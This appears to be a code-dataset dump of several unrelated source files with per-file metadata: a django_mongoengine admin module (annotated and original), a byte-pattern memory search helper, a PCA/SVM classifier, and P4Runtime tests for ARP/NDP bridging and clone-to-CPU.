            self.admin_site.each_context(request),
            title=_('Change history: %s') % force_text(obj),
            action_list=action_list,
            module_name=capfirst(force_text(opts.verbose_name_plural)),
            object=obj,
            opts=opts,
            preserved_filters=self.get_preserved_filters(request),
        )
        context.update(extra_context or {})

        request.current_app = self.admin_site.name

        return TemplateResponse(request, self.object_history_template or [
            "admin/%s/%s/object_history.html" % (app_label, opts.model_name),
            "admin/%s/object_history.html" % app_label,
            "admin/object_history.html"
        ], context)
class InlineDocumentAdmin(BaseDocumentAdmin):
    """
    Options for inline editing of ``model`` instances.

    Provide ``name`` to specify the attribute name of the ``ForeignKey`` from
    ``model`` to its parent. This is required if ``model`` has more than one
    ``ForeignKey`` to its parent.
    """
    document = None
    fk_name = None
    formset = BaseInlineDocumentFormSet
    extra = 1
    max_num = None  # None means no limit on inline forms
    template = None
    verbose_name = None
    verbose_name_plural = None
    can_delete = True

    def __init__(self, parent_document, admin_site):
        self.admin_site = admin_site
        self.parent_document = parent_document
        self.opts = self.model._meta

        super(InlineDocumentAdmin, self).__init__()

        # Fall back to the inline model's own verbose names.
        if self.verbose_name is None:
            self.verbose_name = self.model._meta.verbose_name
        if self.verbose_name_plural is None:
            self.verbose_name_plural = self.model._meta.verbose_name_plural

    media = djmod.ModelAdmin.media

    def get_formset(self, request, obj=None, **kwargs):
        """Returns a BaseInlineFormSet class for use in admin add/change views."""
        if self.declared_fieldsets:
            fields = flatten_fieldsets(self.declared_fieldsets)
        else:
            fields = None
        if self.exclude is None:
            exclude = []
        else:
            exclude = list(self.exclude)
        exclude.extend(kwargs.get("exclude", []))
        exclude.extend(self.get_readonly_fields(request, obj))
        # if exclude is an empty list we use None, since that's the actual
        # default
        exclude = exclude or None
        defaults = {
            "form": self.form,
            "formset": self.formset,
            "fields": fields,
            "exclude": exclude,
            # functools.partial instead of django.utils.functional.curry
            # (deprecated, removed in Django 3.0); matches DocumentAdmin.
            "formfield_callback": partial(self.formfield_for_dbfield, request=request),
            "extra": self.extra,
            "max_num": self.max_num,
            "can_delete": self.can_delete,
        }
        defaults.update(kwargs)
        return inlineformset_factory(self.model, **defaults)

    def get_fieldsets(self, request, obj=None):
        """Return declared fieldsets, or a single default fieldset."""
        if self.declared_fieldsets:
            return self.declared_fieldsets
        form = self.get_formset(request).form
        # Materialize the keys view first: on Python 3, dict_keys does not
        # support `+`, so `form.base_fields.keys() + [...]` raises TypeError.
        fields = list(form.base_fields) + list(self.get_readonly_fields(request, obj))
        return [(None, {'fields': fields})]
class EmbeddedDocumentAdmin(InlineDocumentAdmin):
    """Inline admin bound to one embedded-document field of a parent document.

    ``field`` is either an EmbeddedDocumentField (single embedded document)
    or a ListField of EmbeddedDocumentFields (many).
    """

    def __init__(self, field, parent_document, admin_site):
        # A ListField wraps its element field in `.field`; a bare
        # EmbeddedDocumentField carries document_type directly.
        if hasattr(field, 'field'):
            self.model = field.field.document_type
        else:
            self.model = field.document_type

        # save reference to field for later
        self.doc_list = getattr(parent_document, field.name)
        self.field = field
        if not isinstance(self.doc_list, list):
            self.doc_list = []
        self.rel_name = field.name

        if self.verbose_name is None:
            self.verbose_name = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name)

        if self.verbose_name_plural is None:
            self.verbose_name_plural = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name_plural)

        super(EmbeddedDocumentAdmin, self).__init__(parent_document, admin_site)

    def queryset(self, request):
        # Return the embedded documents as a plain list: for a ListField the
        # field value itself; for a single embedded field, a zero- or
        # one-element list.
        if isinstance(self.field, ListField):  # list field
            self.doc_list = getattr(self.parent_document, self.rel_name)
        else:  # embedded field
            emb_doc = getattr(self.parent_document, self.rel_name)
            if emb_doc is None:
                self.doc_list = []
            else:
                self.doc_list = [emb_doc]
        return self.doc_list
class StackedDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class EmbeddedStackedDocumentAdmin(EmbeddedDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/tabular.html'
| 40.972789 | 156 | 0.638677 | import operator
from functools import reduce, partial
from django import forms
from django.forms.formsets import all_valid
from django.urls import reverse
from django.contrib.admin.exceptions import DisallowedModelAdminToField
from django.contrib.admin import widgets, helpers
from django.contrib.admin.utils import (
unquote, flatten_fieldsets, get_deleted_objects,
)
from django.contrib.admin.options import (
TO_FIELD_VAR, IS_POPUP_VAR,
get_ul_class, csrf_protect_m,
)
from django.utils.html import escape
from django.core.exceptions import PermissionDenied
try:
from django.db.models.related import RelatedObject
except ImportError:
from django.db.models.fields.related import ForeignObjectRel as RelatedObject
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.functional import curry
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from django.forms.forms import pretty_name
from django.forms.models import modelform_defines_fields
from django.conf import settings
from django.apps import apps
from mongoengine import Q
from django_mongoengine.utils import force_text
from django_mongoengine.fields import (ListField, EmbeddedDocumentField,
ReferenceField, StringField)
from django_mongoengine.mongo_admin.util import RelationWrapper
from django_mongoengine.utils.wrappers import copy_class
from django_mongoengine.utils.monkey import get_patched_django_module
from django_mongoengine.forms.documents import (
DocumentForm, documentform_factory, documentformset_factory,
inlineformset_factory, BaseInlineDocumentFormSet)
def get_content_type_for_model(obj):
return apps.get_model("contenttypes.ContentType")()
djmod = get_patched_django_module(
"django.contrib.admin.options",
get_content_type_for_model=get_content_type_for_model,
)
class BaseDocumentAdmin(djmod.ModelAdmin):
form = DocumentForm
def formfield_for_dbfield(self, db_field, **kwargs):
request = kwargs.pop("request", None)
# admin widgets - we just need to use a select widget of some kind.
if db_field.choices is not None:
return self.formfield_for_choice_field(db_field, request, **kwargs)
if isinstance(db_field, ListField) and isinstance(db_field.field, ReferenceField):
return self.formfield_for_manytomany(db_field, request, **kwargs)
# handle RelatedFields
if isinstance(db_field, ReferenceField):
# For non-raw_id fields, wrap the widget with a wrapper that adds
# extra HTML -- the "add other" interface -- to the end of the
# rendered output. formfield can be None if it came from a
# OneToOneField with parent_link=True or a M2M intermediary.
form_field = db_field.formfield(**kwargs)
if db_field.name not in self.raw_id_fields:
related_modeladmin = self.admin_site._registry.get(db_field.document_type)
can_add_related = bool(related_modeladmin and
related_modeladmin.has_add_permission(request))
form_field.widget = widgets.RelatedFieldWidgetWrapper(
form_field.widget, RelationWrapper(db_field.document_type), self.admin_site,
can_add_related=can_add_related)
return form_field
if isinstance(db_field, StringField):
if db_field.max_length is None:
kwargs = dict({'widget': widgets.AdminTextareaWidget}, **kwargs)
else:
kwargs = dict({'widget': widgets.AdminTextInputWidget}, **kwargs)
return db_field.formfield(**kwargs)
# If we've got overrides for the formfield defined, use 'em. **kwargs
# passed to formfield_for_dbfield override the defaults.
for klass in db_field.__class__.mro():
if klass in self.formfield_overrides:
kwargs = dict(self.formfield_overrides[klass], **kwargs)
return db_field.formfield(**kwargs)
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def formfield_for_choice_field(self, db_field, request=None, **kwargs):
# If the field is named as a radio_field, use a RadioSelect
if db_field.name in self.radio_fields:
# Avoid stomping on custom widget/choices arguments.
if 'widget' not in kwargs:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
if 'choices' not in kwargs:
kwargs['choices'] = db_field.get_choices(
include_blank = db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
def formfield_for_manytomany(self, db_field, request=None, **kwargs):
db = kwargs.get('using')
if db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel, using=db)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(pretty_name(db_field.name), (db_field.name in self.filter_vertical))
return db_field.formfield(**kwargs)
def get_view_on_site_url(self, obj=None):
if obj is None or not self.view_on_site:
return None
if callable(self.view_on_site):
return self.view_on_site(obj)
elif self.view_on_site and hasattr(obj, 'get_absolute_url'):
# use the ContentType lookup if view_on_site is True
return reverse('admin:view_on_site', kwargs={
'content_type_id': 0,
'object_id': obj.pk
})
@copy_class(djmod.ModelAdmin)
class DocumentAdmin(BaseDocumentAdmin):
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
super(DocumentAdmin, self).__init__(model, admin_site)
self.log = not settings.DATABASES.get('default', {}).get(
'ENGINE', 'django.db.backends.dummy'
).endswith('dummy')
self.change_list_template = 'admin/change_document_list.html'
# XXX: add inline init somewhere
def _get_inline_instances(self):
for f in self.model._fields.items():
if not (isinstance(f, ListField) and isinstance(getattr(f, 'field', None), EmbeddedDocumentField)) and not isinstance(f, EmbeddedDocumentField):
continue
# Should only reach here if there is an embedded document...
if f.name in self.exclude:
continue
document = self.model()
if hasattr(f, 'field') and f.field is not None:
embedded_document = f.field.document_type
elif hasattr(f, 'document_type'):
embedded_document = f.document_type
else:
# For some reason we found an embedded field were either
# the field attribute or the field's document type is None.
# https://github.com/jschrewe/django-mongoadmin/issues/4
# The solution for now is to ignore that field entirely.
continue
inline_admin = EmbeddedStackedDocumentAdmin
# check if there is an admin for the embedded document in
# self.inlines. If there is, use this, else use default.
for inline_class in self.inlines:
if inline_class.document == embedded_document:
inline_admin = inline_class
inline_instance = inline_admin(f, document, self.admin_site)
# if f is an EmbeddedDocumentField set the maximum allowed form instances to one
if isinstance(f, EmbeddedDocumentField):
inline_instance.max_num = 1
# exclude field from normal form
if f.name not in self.exclude:
self.exclude.append(f.name)
if f.name == 'created_at' and f.name not in self.exclude:
self.exclude.append(f.name)
self.inline_instances.append(inline_instance)
def get_changelist_form(self, request, **kwargs):
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
if defaults.get('fields') is None and not modelform_defines_fields(defaults.get('form')):
defaults['fields'] = forms.ALL_FIELDS
return documentform_factory(self.model, **defaults)
def get_changelist_formset(self, request, **kwargs):
defaults = {
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
}
defaults.update(kwargs)
return documentformset_factory(
self.model, self.get_changelist_form(request), extra=0,
fields=self.list_editable, **defaults
)
def get_changelist(self, request, **kwargs):
from django_mongoengine.mongo_admin.views import DocumentChangeList
return DocumentChangeList
def log_addition(self, request, object, message):
if not self.log:
return
super(DocumentAdmin, self).log_addition(request, object, message)
def log_change(self, request, object, message):
if not self.log:
return
super(DocumentAdmin, self).log_change(request, object, message)
def log_deletion(self, request, object, object_repr):
if not self.log:
return
super(DocumentAdmin, self).log_deletion(request, object, object_repr)
@property
def media(self):
return djmod.ModelAdmin.media.fget(self)
@csrf_protect_m
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
model = self.model
opts = model._meta
if request.method == 'POST' and '_saveasnew' in request.POST:
object_id = None
add = object_id is None
if add:
if not self.has_add_permission(request):
raise PermissionDenied
obj = None
else:
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(opts.verbose_name), 'key': escape(object_id)})
ModelForm = self.get_form(request, obj)
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=not add)
else:
form_validated = False
new_object = form.instance
formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, not add)
self.save_related(request, form, formsets, not add)
change_message = self.construct_change_message(request, form, formsets, add)
if add:
self.log_addition(request, new_object, change_message)
return self.response_add(request, new_object)
else:
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form_validated = False
else:
if add:
initial = self.get_changeform_initial_data(request)
form = ModelForm(initial=initial)
formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
else:
form = ModelForm(instance=obj)
formsets, inline_instances = self._create_formsets(request, obj, change=True)
adminForm = helpers.AdminForm(
form,
list(self.get_fieldsets(request, obj)),
self.get_prepopulated_fields(request, obj),
self.get_readonly_fields(request, obj),
model_admin=self)
media = self.media + adminForm.media
inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
for inline_formset in inline_formsets:
media = media + inline_formset.media
context = dict(self.admin_site.each_context(request),
title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
adminform=adminForm,
object_id=object_id,
original=obj,
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
media=media,
inline_admin_formsets=inline_formsets,
errors=helpers.AdminErrorList(form, formsets),
preserved_filters=self.get_preserved_filters(request),
)
# Hide the "Save" and "Save and continue" buttons if "Save as New" was
# previously chosen to prevent the interface from getting confusing.
if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
context['show_save'] = False
context['show_save_and_continue'] = False
# Use the change template instead of the add template.
add = False
context.update(extra_context or {})
return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)
@csrf_protect_m
def delete_view(self, request, object_id, extra_context=None):
opts = self.model._meta
app_label = opts.app_label
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(opts.verbose_name), 'key': escape(object_id)}
)
from django.db import router
using = router.db_for_write(self.model)
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
(deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
[obj], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_text(obj)
attr = str(to_field) if to_field else opts.pk.attname
obj_id = obj.serializable_value(attr)
self.log_deletion(request, obj, obj_display)
self.delete_model(request, obj)
return self.response_delete(request, obj_display, obj_id)
object_name = force_text(opts.verbose_name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": object_name}
else:
title = _("Are you sure?")
context = dict(
self.admin_site.each_context(request),
title=title,
object_name=object_name,
object=obj,
deleted_objects=deleted_objects,
model_count=dict(model_count).items(),
perms_lacking=perms_needed,
protected=protected,
opts=opts,
app_label=app_label,
preserved_filters=self.get_preserved_filters(request),
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
)
context.update(extra_context or {})
return self.render_delete_form(request, context)
def history_view(self, request, object_id, extra_context=None):
from django.contrib.admin.models import LogEntry
# First check if the user can see this history.
model = self.model
obj = self.get_object(request, unquote(object_id))
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(model._meta.verbose_name),
'key': escape(object_id),
})
if not self.has_change_permission(request, obj):
raise PermissionDenied
# Then get the history for this object.
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id=unquote(object_id),
content_type=get_content_type_for_model(model)
).select_related().order_by('action_time')
context = dict(
self.admin_site.each_context(request),
title=_('Change history: %s') % force_text(obj),
action_list=action_list,
module_name=capfirst(force_text(opts.verbose_name_plural)),
object=obj,
opts=opts,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.model_name),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context)
class InlineDocumentAdmin(BaseDocumentAdmin):
document = None
fk_name = None
formset = BaseInlineDocumentFormSet
extra = 1
max_num = None
template = None
verbose_name = None
verbose_name_plural = None
can_delete = True
def __init__(self, parent_document, admin_site):
self.admin_site = admin_site
self.parent_document = parent_document
self.opts = self.model._meta
super(InlineDocumentAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
media = djmod.ModelAdmin.media
def get_formset(self, request, obj=None, **kwargs):
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(kwargs.get("exclude", []))
exclude.extend(self.get_readonly_fields(request, obj))
# if exclude is an empty list we use None, since that's the actual
exclude = exclude or None
defaults = {
"form": self.form,
"formset": self.formset,
"fields": fields,
"exclude": exclude,
"formfield_callback": curry(self.formfield_for_dbfield, request=request),
"extra": self.extra,
"max_num": self.max_num,
"can_delete": self.can_delete,
}
defaults.update(kwargs)
return inlineformset_factory(self.model, **defaults)
def get_fieldsets(self, request, obj=None):
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_formset(request).form
fields = form.base_fields.keys() + list(self.get_readonly_fields(request, obj))
return [(None, {'fields': fields})]
class EmbeddedDocumentAdmin(InlineDocumentAdmin):
def __init__(self, field, parent_document, admin_site):
if hasattr(field, 'field'):
self.model = field.field.document_type
else:
self.model = field.document_type
self.doc_list = getattr(parent_document, field.name)
self.field = field
if not isinstance(self.doc_list, list):
self.doc_list = []
self.rel_name = field.name
if self.verbose_name is None:
self.verbose_name = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name)
if self.verbose_name_plural is None:
self.verbose_name_plural = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name_plural)
super(EmbeddedDocumentAdmin, self).__init__(parent_document, admin_site)
def queryset(self, request):
if isinstance(self.field, ListField):
self.doc_list = getattr(self.parent_document, self.rel_name)
else:
emb_doc = getattr(self.parent_document, self.rel_name)
if emb_doc is None:
self.doc_list = []
else:
self.doc_list = [emb_doc]
return self.doc_list
class StackedDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class EmbeddedStackedDocumentAdmin(EmbeddedDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/tabular.html'
| true | true |
f7231cca10950bdf68f2ae42faed1754e83b258a | 652 | py | Python | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | 3 | 2021-11-11T23:10:59.000Z | 2022-02-05T09:14:15.000Z | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | 3 | 2021-01-12T21:31:18.000Z | 2021-11-11T23:12:02.000Z | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | null | null | null | import re
from ..pattern.Pattern import Pattern
from .exceptions import (MemorySearchNotFoundException,
MemorySearchTooManyMatchException)
class MemorySearch:
def __init__(self, memory: bytes):
self.memory = memory
def find_pattern(self, pattern: Pattern) -> re.Match:
regex = pattern.to_regex()
res = None
for m in re.finditer(regex, self.memory):
if res is not None:
raise MemorySearchTooManyMatchException("More than 1 matches")
res = m
if res is None:
raise MemorySearchNotFoundException("No match")
return res
| 29.636364 | 78 | 0.630368 | import re
from ..pattern.Pattern import Pattern
from .exceptions import (MemorySearchNotFoundException,
MemorySearchTooManyMatchException)
class MemorySearch:
def __init__(self, memory: bytes):
self.memory = memory
def find_pattern(self, pattern: Pattern) -> re.Match:
regex = pattern.to_regex()
res = None
for m in re.finditer(regex, self.memory):
if res is not None:
raise MemorySearchTooManyMatchException("More than 1 matches")
res = m
if res is None:
raise MemorySearchNotFoundException("No match")
return res
| true | true |
f7231ee03b215c0cb929c791fa2e3255ae82ab06 | 1,810 | py | Python | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn import init
from torch.utils.data import DataLoader
from overrides import overrides
import numpy as np
import time
from models.BaseModel import BaseModel
class PCAModel(BaseModel):
def __init__(self, configs: object):
super().__init__(configs.model.model_name, configs.device)
from sklearn.decomposition import PCA
self.pca_cls = PCA(n_components=30)
from sklearn.svm import SVC
self.svm_cls = SVC(kernel="rbf", probability=True, )
@overrides
def train_epoch(self, epoch_num: int, train_loader: DataLoader):
x = torch.flatten(train_loader.dataset.data, 1).numpy()
y = train_loader.dataset.targets.numpy()
self.pca_cls.fit(x, y)
x_pca = self.pca_cls.transform(x)
# print(x_pca.shape)
self.svm_cls.fit(x_pca, y)
@overrides
def test_epoch(self, epoch_num: int, test_loader: DataLoader):
x = torch.flatten(test_loader.dataset.data, 1).numpy()
y = test_loader.dataset.targets.numpy()
pca_result: np.ndarray = self.pca_cls.transform(x)
predict_score = self.svm_cls.predict(pca_result)
predict_result = predict_score
# predict_result = np.argmax(predict_score,axis=1)
# print(x.shape, predict_score.shape, predict_result.shape, y.shape)
results: np.ndarray = predict_result == y
return sum(results) / len(results)
@overrides
def run_epochs(self, epochs: int, train_loader: DataLoader, test_loader: DataLoader):
t1 = time.time()
self.train_epoch(0, train_loader)
t2 = time.time()
acc = self.test_epoch(0, test_loader)
if self.writer:
self.writer.add_scalar('test_acc', acc, 0)
print(acc, t2 - t1, time.time() - t2)
| 35.490196 | 89 | 0.670166 | import torch
from torch import nn
from torch.nn import init
from torch.utils.data import DataLoader
from overrides import overrides
import numpy as np
import time
from models.BaseModel import BaseModel
class PCAModel(BaseModel):
def __init__(self, configs: object):
super().__init__(configs.model.model_name, configs.device)
from sklearn.decomposition import PCA
self.pca_cls = PCA(n_components=30)
from sklearn.svm import SVC
self.svm_cls = SVC(kernel="rbf", probability=True, )
@overrides
def train_epoch(self, epoch_num: int, train_loader: DataLoader):
x = torch.flatten(train_loader.dataset.data, 1).numpy()
y = train_loader.dataset.targets.numpy()
self.pca_cls.fit(x, y)
x_pca = self.pca_cls.transform(x)
self.svm_cls.fit(x_pca, y)
@overrides
def test_epoch(self, epoch_num: int, test_loader: DataLoader):
x = torch.flatten(test_loader.dataset.data, 1).numpy()
y = test_loader.dataset.targets.numpy()
pca_result: np.ndarray = self.pca_cls.transform(x)
predict_score = self.svm_cls.predict(pca_result)
predict_result = predict_score
results: np.ndarray = predict_result == y
return sum(results) / len(results)
@overrides
def run_epochs(self, epochs: int, train_loader: DataLoader, test_loader: DataLoader):
t1 = time.time()
self.train_epoch(0, train_loader)
t2 = time.time()
acc = self.test_epoch(0, test_loader)
if self.writer:
self.writer.add_scalar('test_acc', acc, 0)
print(acc, t2 - t1, time.time() - t2)
| true | true |
f7231f236ea0911cdecd1c3501b6bbc5111e564b | 11,176 | py | Python | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-present Barefoot Networks, Inc.
# Copyright 2018-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
# BRIDGING TESTS
#
# To run all tests in this file:
# cd ptf
# make bridging
#
# To run a specific test case:
# make bridging.<TEST CLASS NAME>
#
# For example:
# make bridging.BridgingTest
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Modify everywhere you see TODO
#
# When providing your solution, make sure to use the same names for P4Runtime
# entities as specified in your P4Info file.
#
# Test cases are based on the P4 program design suggested in the exercises
# README. Make sure to modify the test cases accordingly if you decide to
# implement the pipeline differently.
# ------------------------------------------------------------------------------
from ptf.testutils import group
from base_test import *
# From the P4 program.
CPU_CLONE_SESSION_ID = 99
@group("bridging")
class ArpNdpRequestWithCloneTest(P4RuntimeTest):
"""Tests ability to broadcast ARP requests and NDP Neighbor Solicitation
(NS) messages as well as cloning to CPU (controller) for host discovery.
"""
def runTest(self):
# Test With both ARP and NDP NS packets...
print_inline("ARP request ... ")
arp_pkt = testutils.simple_arp_packet()
self.testPacket(arp_pkt)
print_inline("NDP NS ... ")
ndp_pkt = genNdpNsPkt(src_mac=HOST1_MAC, src_ip=HOST1_IPV6,
target_ip=HOST2_IPV6)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
mcast_group_id = 10
mcast_ports = [self.port1, self.port2, self.port3]
# Add multicast group.
self.insert_pre_multicast_group(
group_id=mcast_group_id,
ports=mcast_ports)
# Match eth dst: FF:FF:FF:FF:FF:FF (MAC broadcast for ARP requests)
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
# Ternary match.
"hdr.ethernet.dst_addr": (
"FF:FF:FF:FF:FF:FF",
"FF:FF:FF:FF:FF:FF")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
# ---- END SOLUTION ----
# Match eth dst: 33:33:**:**:**:** (IPv6 multicast for NDP requests)
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
# Ternary match (value, mask)
"hdr.ethernet.dst_addr": (
"33:33:00:00:00:00",
"FF:FF:00:00:00:00")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
# ---- END SOLUTION ----
# Insert CPU clone session.
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
# ACL entry to clone ARPs
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
# ACL entry to clone NDP Neighbor Solicitation
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NS_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
for inport in mcast_ports:
# Send packet...
testutils.send_packet(self, inport, str(pkt))
# Pkt should be received on CPU via PacketIn...
# Expected P4Runtime PacketIn message.
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": inport,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
# ...and on all ports except the ingress one.
verify_ports = set(mcast_ports)
verify_ports.discard(inport)
for port in verify_ports:
testutils.verify_packet(self, pkt, port)
testutils.verify_no_other_packets(self)
@group("bridging")
class ArpNdpReplyWithCloneTest(P4RuntimeTest):
"""Tests ability to clone ARP replies and NDP Neighbor Advertisement
(NA) messages as well as unicast forwarding to requesting host.
"""
def runTest(self):
# Test With both ARP and NDP NS packets...
print_inline("ARP reply ... ")
# op=1 request, op=2 relpy
arp_pkt = testutils.simple_arp_packet(
eth_src=HOST1_MAC, eth_dst=HOST2_MAC, arp_op=2)
self.testPacket(arp_pkt)
print_inline("NDP NA ... ")
ndp_pkt = genNdpNaPkt(target_ip=HOST1_IPV6, target_mac=HOST1_MAC)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
# L2 unicast entry, match on pkt's eth dst address.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
# ---- END SOLUTION ----
# CPU clone session.
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
# ACL entry to clone ARPs
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
# ACL entry to clone NDP Neighbor Solicitation
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
